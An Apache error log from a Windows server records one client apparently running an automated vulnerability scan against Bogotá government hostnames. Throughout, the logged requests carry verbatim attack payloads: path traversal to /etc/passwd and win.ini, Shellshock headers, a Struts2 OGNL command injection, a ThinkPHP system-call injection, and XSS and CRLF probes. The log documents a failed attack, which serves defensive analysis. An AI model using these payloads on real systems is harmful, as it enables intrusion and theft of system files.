[Thu Jun 02 05:36:18.362606 2022] [core:error] [pid 8808:tid 20996] [client 46.101.1.185:39204] AH00126: Invalid URI in request GET /asd/../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:18.378206 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:39210] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi
[Thu Jun 02 05:36:18.440606 2022] [core:error] [pid 8808:tid 21180] [client 46.101.1.185:39220] AH00126: Invalid URI in request GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:36:18.440606 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:39222] AH00126: Invalid URI in request GET /./../../../../../../../../../../windows/win.ini HTTP/1.1
[Thu Jun 02 05:36:18.674606 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:39240] script not found or unable to stat: E:/nuevo/cgi-bin/Maconomy
[Thu Jun 02 05:36:18.783807 2022] [cgi:error] [pid 8808:tid 21224] [client 46.101.1.185:39264] script not found or unable to stat: E:/nuevo/htdocs/man.cgi
[Thu Jun 02 05:36:18.986607 2022] [cgi:error] [pid 8808:tid 21224] [client 46.101.1.185:39276] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 05:36:19.673008 2022] [core:error] [pid 8808:tid 21032] [client 46.101.1.185:39366] AH00126: Invalid URI in request GET /./../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:19.673008 2022] [core:error] [pid 8808:tid 21180] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:39368] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:19.985009 2022] [core:error] [pid 8808:tid 21032] [client 46.101.1.185:39400] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:20.031809 2022] [core:error] [pid 8808:tid 21224] (22)Invalid argument: [client 46.101.1.185:39414] AH00127: Cannot map GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:20.219009 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:39430] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Thu Jun 02 05:36:20.297009 2022] [core:error] [pid 8808:tid 21032] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:39444] AH00127: Cannot map GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:20.577810 2022] [authz_core:error] [pid 8808:tid 21144] [client 46.101.1.185:39476] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/setup/index.php
[Thu Jun 02 05:36:20.655810 2022] [cgi:error] [pid 8808:tid 21032] [client 46.101.1.185:39496] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Thu Jun 02 05:36:20.905410 2022] [cgi:error] [pid 8808:tid 21032] [client 46.101.1.185:39520] script not found or unable to stat: E:/nuevo/cgi-bin/jarrewrite.sh
[Thu Jun 02 05:36:21.373411 2022] [core:error] [pid 8808:tid 20724] (22)Invalid argument: [client 46.101.1.185:39670] AH00127: Cannot map GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 to file
[Thu Jun 02 05:36:21.389011 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:39674] AH00126: Invalid URI in request GET /node_modules/../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:21.919412 2022] [cgi:error] [pid 8808:tid 20656] [client 46.101.1.185:39724] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:22.231413 2022] [cgi:error] [pid 8808:tid 21176] [client 46.101.1.185:39762] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://ambientic.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:36:22.543413 2022] [cgi:error] [pid 8808:tid 20688] [client 46.101.1.185:39804] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://ambientic.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:36:23.089414 2022] [cgi:error] [pid 8808:tid 20772] [client 46.101.1.185:39868] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:23.120614 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:39874] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:23.385815 2022] [cgi:error] [pid 8808:tid 20772] [client 46.101.1.185:39898] script not found or unable to stat: E:/nuevo/htdocs/password_change.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:23.697815 2022] [core:error] [pid 8808:tid 21208] [client 46.101.1.185:39932] AH00126: Invalid URI in request GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1, referer: ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:25.491818 2022] [core:error] [pid 8808:tid 20736] (20025)The given path contained wildcard characters: [client 46.101.1.185:40104] AH00036: access to /s=set&_method=__construct&method=*&filter[]=system failed (filesystem path 'E:/nuevo/htdocs/s=set&_method=__construct&method=*&filter[]=system')
[Thu Jun 02 05:36:25.632219 2022] [cgi:error] [pid 8808:tid 21168] [client 46.101.1.185:40124] script not found or unable to stat: E:/nuevo/cgi-bin/status
[Thu Jun 02 05:36:25.959819 2022] [core:error] [pid 8808:tid 20760] [client 46.101.1.185:40156] AH00126: Invalid URI in request GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1
[Thu Jun 02 05:36:26.708621 2022] [core:error] [pid 8808:tid 20676] [client 46.101.1.185:39692] AH00126: Invalid URI in request helo target
[Thu Jun 02 05:36:27.831823 2022] [core:error] [pid 8808:tid 20768] [client 46.101.1.185:40342] AH00126: Invalid URI in request GET /../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:28.721024 2022] [core:error] [pid 8808:tid 21208] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:40436] AH00127: Cannot map GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1 to file
[Thu Jun 02 05:36:28.721024 2022] [cgi:error] [pid 8808:tid 20772] [client 46.101.1.185:40438] script not found or unable to stat: E:/nuevo/htdocs/passwordrecovered.cgi
[Thu Jun 02 05:36:28.736624 2022] [cgi:error] [pid 8808:tid 21168] [client 46.101.1.185:40442] script not found or unable to stat: E:/nuevo/cgi-bin/GetSrvInfo.exe
[Thu Jun 02 05:36:29.079825 2022] [cgi:error] [pid 8808:tid 20784] [client 46.101.1.185:40478] script not found or unable to stat: E:/nuevo/cgi-bin/slogin
[Thu Jun 02 05:36:29.438625 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:40516] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:29.610226 2022] [cgi:error] [pid 8808:tid 20784] [client 46.101.1.185:40530] script not found or unable to stat: E:/nuevo/htdocs/netcore_get.cgi
[Thu Jun 02 05:36:29.657026 2022] [core:error] [pid 8808:tid 20740] [client 46.101.1.185:40034] AH00126: Invalid URI in request helo target
[Thu Jun 02 05:36:29.688226 2022] [core:error] [pid 8808:tid 21208] [client 46.101.1.185:40536] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:29.750626 2022] [cgi:error] [pid 8808:tid 21168] [client 46.101.1.185:40550] script not found or unable to stat: E:/nuevo/cgi-bin/stats, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:30.062626 2022] [cgi:error] [pid 8808:tid 20676] [client 46.101.1.185:40584] script not found or unable to stat: E:/nuevo/cgi-bin/test, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:30.327827 2022] [core:error] [pid 8808:tid 20768] [client 46.101.1.185:40610] AH00126: Invalid URI in request GET /msa/../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:30.343427 2022] [core:error] [pid 8808:tid 20676] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:40612] AH00127: Cannot map GET /hsqldb%0a HTTP/1.1 to file
[Thu Jun 02 05:36:30.374627 2022] [cgi:error] [pid 8808:tid 20716] [client 46.101.1.185:40616] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:30.639827 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:40640] AH00126: Invalid URI in request GET /./../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:30.702228 2022] [cgi:error] [pid 8808:tid 21168] [client 46.101.1.185:40648] script not found or unable to stat: E:/nuevo/htdocs/test.cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:30.780228 2022] [cgi:error] [pid 8808:tid 20656] [client 46.101.1.185:40660] script not found or unable to stat: E:/nuevo/cgi-bin/jarrewrite.sh
[Thu Jun 02 05:36:31.014228 2022] [cgi:error] [pid 8808:tid 20716] [client 46.101.1.185:40680] script not found or unable to stat: E:/nuevo/htdocs/debug.cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:31.185828 2022] [cgi:error] [pid 8808:tid 20784] [client 46.101.1.185:40696] script not found or unable to stat: E:/nuevo/cgi-bin/execute_cmd.cgi
[Thu Jun 02 05:36:31.326229 2022] [core:error] [pid 8808:tid 21168] [client 46.101.1.185:40710] AH00126: Invalid URI in request GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
[Thu Jun 02 05:36:31.326229 2022] [cgi:error] [pid 8808:tid 20676] [client 46.101.1.185:40712] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:31.404229 2022] [core:error] [pid 8808:tid 20696] [client 46.101.1.185:40724] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:31.716229 2022] [core:error] [pid 8808:tid 20768] [client 46.101.1.185:40756] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:32.043830 2022] [core:error] [pid 8808:tid 20688] [client 46.101.1.185:40790] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:32.293430 2022] [cgi:error] [pid 8808:tid 20740] [client 46.101.1.185:40816] script not found or unable to stat: E:/nuevo/htdocs/WEBACCOUNT.CGI
[Thu Jun 02 05:36:32.355831 2022] [core:error] [pid 8808:tid 20768] [client 46.101.1.185:40824] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:32.621031 2022] [cgi:error] [pid 8808:tid 21176] [client 46.101.1.185:40852] script not found or unable to stat: E:/nuevo/htdocs/index.asp
[Thu Jun 02 05:36:32.667831 2022] [core:error] [pid 8808:tid 20688] [client 46.101.1.185:40856] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:32.979832 2022] [core:error] [pid 8808:tid 20736] [client 46.101.1.185:40884] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:33.167032 2022] [cgi:error] [pid 8808:tid 20656] [client 46.101.1.185:40892] script not found or unable to stat: E:/nuevo/cgi-bin/file_transfer.cgi
[Thu Jun 02 05:36:33.291832 2022] [core:error] [pid 8808:tid 20768] [client 46.101.1.185:40914] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:33.619433 2022] [core:error] [pid 8808:tid 20656] [client 46.101.1.185:40942] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:33.931433 2022] [core:error] [pid 8808:tid 21176] [client 46.101.1.185:40972] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:34.025033 2022] [cgi:error] [pid 8808:tid 20664] [client 46.101.1.185:40976] script not found or unable to stat: E:/nuevo/htdocs/appGet.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:34.165434 2022] [authz_core:error] [pid 8808:tid 20676] [client 46.101.1.185:40992] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/index.php
[Thu Jun 02 05:36:34.243434 2022] [core:error] [pid 8808:tid 20768] [client 46.101.1.185:41002] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:34.352634 2022] [core:error] [pid 8808:tid 20740] [client 46.101.1.185:41006] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Thu Jun 02 05:36:34.493034 2022] [authz_core:error] [pid 8808:tid 21168] [client 46.101.1.185:41022] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Thu Jun 02 05:36:34.555434 2022] [core:error] [pid 8808:tid 20656] [client 46.101.1.185:41032] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:34.773835 2022] [core:error] [pid 8808:tid 20608] [client 46.101.1.185:41072] AH00126: Invalid URI in request GET /asd/../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:34.820635 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:40560] AH00126: Invalid URI in request helo target
[Thu Jun 02 05:36:34.836235 2022] [cgi:error] [pid 8808:tid 20740] [client 46.101.1.185:41096] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:36:34.867435 2022] [core:error] [pid 8808:tid 20468] [client 46.101.1.185:41112] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:35.101435 2022] [cgi:error] [pid 8808:tid 20584] [client 46.101.1.185:41152] script not found or unable to stat: E:/nuevo/cgi-bin/manlist
[Thu Jun 02 05:36:35.148235 2022] [cgi:error] [pid 8808:tid 20704] [client 46.101.1.185:41176] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://portal.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:36:35.179435 2022] [cgi:error] [pid 8808:tid 20736] [client 46.101.1.185:41180] script not found or unable to stat: E:/nuevo/htdocs/password_change.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:36:35.179435 2022] [core:error] [pid 8808:tid 20656] [client 46.101.1.185:41190] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:35.397836 2022] [cgi:error] [pid 8808:tid 20640] [client 46.101.1.185:41224] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Thu Jun 02 05:36:35.397836 2022] [core:error] [pid 8808:tid 20624] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:41228] AH00127: Cannot map GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 to file
[Thu Jun 02 05:36:35.413436 2022] [core:error] [pid 8808:tid 20600] [client 46.101.1.185:41234] AH00126: Invalid URI in request GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:35.475836 2022] [cgi:error] [pid 8808:tid 20772] [client 46.101.1.185:41258] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://portal.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:36:35.491436 2022] [core:error] [pid 8808:tid 20512] [client 46.101.1.185:41264] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:36:35.507036 2022] [core:error] [pid 8808:tid 20488] [client 46.101.1.185:41270] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:35.600636 2022] [negotiation:error] [pid 8808:tid 20584] [client 46.101.1.185:41278] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:35.694236 2022] [core:error] [pid 8808:tid 20512] [client 46.101.1.185:41296] AH00126: Invalid URI in request GET /msa/../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:35.803437 2022] [core:error] [pid 8808:tid 20768] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:41346] AH00127: Cannot map GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1 to file
[Thu Jun 02 05:36:35.819037 2022] [core:error] [pid 8808:tid 20688] [client 46.101.1.185:41348] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:35.912637 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:41360] script not found or unable to stat: E:/nuevo/cgi-bin/supportInstaller
[Thu Jun 02 05:36:35.990637 2022] [negotiation:error] [pid 8808:tid 20488] [client 46.101.1.185:41370] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:36.099837 2022] [negotiation:error] [pid 8808:tid 20544] [client 46.101.1.185:41418] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: ambientic.ambientebogota.gov.co:80/user/register
[Thu Jun 02 05:36:36.146637 2022] [core:error] [pid 8808:tid 20488] [client 46.101.1.185:41434] AH00126: Invalid URI in request GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:36.302637 2022] [negotiation:error] [pid 8808:tid 20688] [client 46.101.1.185:41450] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:36.630238 2022] [negotiation:error] [pid 8808:tid 20476] [client 46.101.1.185:41532] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:36.786238 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:41596] AH00126: Invalid URI in request GET /img/../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:36.864238 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:41606] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:36:36.942239 2022] [negotiation:error] [pid 8808:tid 20872] [client 46.101.1.185:41616] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:36.957839 2022] [cgi:error] [pid 8808:tid 21240] [client 46.101.1.185:41628] script not found or unable to stat: E:/nuevo/cgi-bin/config.exp
[Thu Jun 02 05:36:37.254239 2022] [negotiation:error] [pid 8808:tid 21224] [client 46.101.1.185:41700] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:37.285439 2022] [authz_core:error] [pid 8808:tid 20932] [client 46.101.1.185:41718] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Thu Jun 02 05:36:37.301039 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:41722] script not found or unable to stat: E:/nuevo/htdocs/if.cgi
[Thu Jun 02 05:36:37.566240 2022] [negotiation:error] [pid 8808:tid 21244] [client 46.101.1.185:41780] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:37.597440 2022] [cgi:error] [pid 8808:tid 20760] [client 46.101.1.185:41794] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Thu Jun 02 05:36:37.597440 2022] [cgi:error] [pid 8808:tid 21048] [client 46.101.1.185:41800] script not found or unable to stat: E:/nuevo/htdocs/appGet.cgi, referer: http://portal.ambientebogota.gov.co:80
[Thu Jun 02 05:36:37.675440 2022] [core:error] [pid 8808:tid 21240] [client 46.101.1.185:41828] AH00126: Invalid URI in request GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:37.706640 2022] [cgi:error] [pid 8808:tid 21280] [client 46.101.1.185:41840] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:36:37.722240 2022] [cgi:error] [pid 8808:tid 21296] [client 46.101.1.185:41844] script not found or unable to stat: E:/nuevo/cgi-bin/logo_extra_upload.cgi
[Thu Jun 02 05:36:38.221441 2022] [cgi:error] [pid 8808:tid 21296] [client 46.101.1.185:41956] script not found or unable to stat: E:/nuevo/htdocs/if.cgi
[Thu Jun 02 05:36:38.517841 2022] [core:error] [pid 8808:tid 21280] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:42020] AH00127: Cannot map GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 to file
[Thu Jun 02 05:36:38.533441 2022] [core:error] [pid 8808:tid 21208] [client 46.101.1.185:42034] AH00126: Invalid URI in request GET /../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:38.549041 2022] [core:error] [pid 8808:tid 20624] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:42040] AH00127: Cannot map GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 to file
[Thu Jun 02 05:36:38.564641 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:42050] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 02 05:36:38.876642 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:42116] script not found or unable to stat: E:/nuevo/cgi-bin/tsaupload.cgi
[Thu Jun 02 05:36:39.032642 2022] [core:error] [pid 8808:tid 20872] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:42162] AH00127: Cannot map GET /\\u001B]8;;https://example.com"/onmouseover="alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1 to file
[Thu Jun 02 05:36:39.141842 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:42174] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:39.173042 2022] [core:error] [pid 8808:tid 21016] [client 46.101.1.185:42182] AH00126: Invalid URI in request GET ///////../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:39.204243 2022] [authz_core:error] [pid 8808:tid 21240] [client 46.101.1.185:42192] AH01630: client denied by server configuration: E:/nuevo/htdocs/xampp/phpmyadmin
[Thu Jun 02 05:36:39.204243 2022] [core:error] [pid 8808:tid 20536] [client 46.101.1.185:42206] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:39.453843 2022] [cgi:error] [pid 8808:tid 21052] [client 46.101.1.185:42250] script not found or unable to stat: E:/nuevo/cgi-bin/stats, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:39.485043 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:42260] AH00126: Invalid URI in request GET /node_modules/../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:39.703443 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:42318] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:39.765844 2022] [cgi:error] [pid 8808:tid 21296] [client 46.101.1.185:42326] script not found or unable to stat: E:/nuevo/cgi-bin/test, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:39.797044 2022] [core:error] [pid 8808:tid 21048] [client 46.101.1.185:42328] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:39.797044 2022] [core:error] [pid 8808:tid 20624] [client 46.101.1.185:42334] AH00126: Invalid URI in request GET ///../app.js HTTP/1.1
[Thu Jun 02 05:36:39.843844 2022] [authz_core:error] [pid 8808:tid 21152] [client 46.101.1.185:42352] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/setup/index.php
[Thu Jun 02 05:36:40.093444 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:42394] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:40.109044 2022] [cgi:error] [pid 8808:tid 21280] [client 46.101.1.185:42398] script not found or unable to stat: E:/nuevo/cgi-bin/koha
[Thu Jun 02 05:36:40.140244 2022] [authz_core:error] [pid 8808:tid 20552] [client 46.101.1.185:42410] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/server_import.php
[Thu Jun 02 05:36:40.140244 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:42416] script not found or unable to stat: E:/nuevo/cgi-bin/logo_extra_upload.cgi
[Thu Jun 02 05:36:40.405445 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:42462] script not found or unable to stat: E:/nuevo/htdocs/test.cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:40.452245 2022] [authz_core:error] [pid 8808:tid 21144] [client 46.101.1.185:42476] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin 2
[Thu Jun 02 05:36:40.608245 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:42512] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 02 05:36:40.717445 2022] [cgi:error] [pid 8808:tid 21152] [client 46.101.1.185:42530] script not found or unable to stat: E:/nuevo/htdocs/debug.cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:41.045046 2022] [cgi:error] [pid 8808:tid 20760] [client 46.101.1.185:42602] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Thu Jun 02 05:36:41.310246 2022] [cgi:error] [pid 8808:tid 20848] [client 46.101.1.185:42660] script not found or unable to stat: E:/nuevo/cgi-bin/privatekey.pem
[Thu Jun 02 05:36:41.435046 2022] [authz_core:error] [pid 8808:tid 21180] [client 46.101.1.185:42696] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/index.php
[Thu Jun 02 05:36:41.513047 2022] [core:error] [pid 8808:tid 21244] [client 46.101.1.185:42710] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:41.747047 2022] [authz_core:error] [pid 8808:tid 21224] [client 46.101.1.185:42762] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Thu Jun 02 05:36:41.825047 2022] [core:error] [pid 8808:tid 21048] [client 46.101.1.185:42776] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:42.059048 2022] [cgi:error] [pid 8808:tid 20552] [client 46.101.1.185:42830] script not found or unable to stat: E:/nuevo/htdocs/netcore_get.cgi
[Thu Jun 02 05:36:42.137048 2022] [core:error] [pid 8808:tid 21072] [client 46.101.1.185:42848] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:42.152648 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:42854] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://portal.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:42.339848 2022] [core:error] [pid 8808:tid 20808] [client 46.101.1.185:42880] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:42.355448 2022] [authz_core:error] [pid 8808:tid 21152] [client 46.101.1.185:42888] AH01630: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Thu Jun 02 05:36:42.449048 2022] [core:error] [pid 8808:tid 20848] [client 46.101.1.185:42914] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:42.464648 2022] [cgi:error] [pid 8808:tid 21296] [client 46.101.1.185:42922] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://portal.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:42.636249 2022] [core:error] [pid 8808:tid 21296] [client 46.101.1.185:42942] AH00126: Invalid URI in request GET /../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:42.698649 2022] [core:error] [pid 8808:tid 20760] [client 46.101.1.185:42962] AH00126: Invalid URI in request t3 12.2.1
